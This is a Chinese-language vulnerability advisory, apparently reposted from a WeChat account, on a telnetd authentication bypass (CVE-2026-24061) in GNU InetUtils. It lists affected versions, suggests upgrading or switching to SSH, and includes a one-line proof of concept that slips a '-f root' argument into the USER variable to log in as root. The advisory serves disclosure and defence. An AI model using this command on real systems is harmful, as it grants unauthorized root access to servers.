文章总结： GNUInetUtilstelnetd存在CVE-2026-24061远程认证绕过漏洞，影响1.9.3至2.7版本。攻击者可利用特定参数绕过验证直接获取root权限。建议立即升级至2.7以上版本或改用SSH以修复该高危风险。 综合评分： 72 文章分类： 漏洞预警,漏洞分析,漏洞POC

GNU InetUtils telnetd 远程认证绕过漏洞（CVE-2026-24061）

喜欢挖洞吗 喜欢挖洞吗

喜欢挖洞吗

2026年1月22日 11:37 北京

免责声明

1. 1. 本公众号发布的网络安全工具、POC 脚本、技术文章等内容，仅面向具备合法授权的网络安全从业人员、技术爱好者用于合法合规的渗透测试、安全研究、漏洞验证及技术学习交流，严禁用于任何未经授权的非法攻击、入侵他人网络或信息系统的行为。
2. 2. 任何单位或个人在使用本公众号内容前，必须确保已获得目标系统的合法授权，并严格遵守《网络安全法》《数据安全法》《个人信息保护法》等国家相关法律法规及行业规范，独立承担因违规使用所产生的全部法律责任、经济损失及一切后果，与本公众号及作者无关。
3. 3. 本公众号发布的内容仅为技术研究与分享，不构成任何攻击指导、非法用途的暗示或诱导。所有工具及 POC 的安全性、稳定性未经全面验证，仅供学习参考，使用者需自行评估风险并承担使用后果，本公众号及作者不承担任何因工具使用不当、漏洞利用失误导致的直接或间接损失。
4. 4. 本公众号尊重并保护各类知识产权，发布的内容若涉及第三方技术、工具或资料，均已注明来源或基于合法授权。若存在侵权行为，请及时联系作者删除，任何未经授权的转载、篡改、传播本公众号内容的行为，需自行承担相应法律责任。
5. 5. 凡浏览、关注本公众号或使用本公众号内容者，即视为已充分理解并同意本免责声明全部条款。若您不同意本声明，请勿使用本公众号任何内容。

漏洞描述

GNU InetUtils telnetd 远程认证绕过漏洞（CVE-2026-24061），GNU InetUtils telnetd 是 GNU InetUtils 套件中的远程登录服务守护进程，2026年1月互联网披露 GNU InetUtils telnetd 远程认证绕过漏洞（CVE-2026-24061），该漏洞允许远程攻击者绕过 telnetd 的身份验证机制，直接获取root权限，可导致服务器失陷。

POC

USER='-f root' telnet -a localhost

受影响版本：

1.9.3 <= GNU InetUtils telnetd <= 2.7

解决建议

1. 1. 将 GNU InetUtils telnetd 升级到 2.7 以上版本
2. 2. 建议使用 ssh 代替 telnetd

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：喜欢挖洞吗 喜欢挖洞吗 喜欢挖洞吗《GNU InetUtils telnetd 远程认证绕过漏洞（CVE-2026-24061）》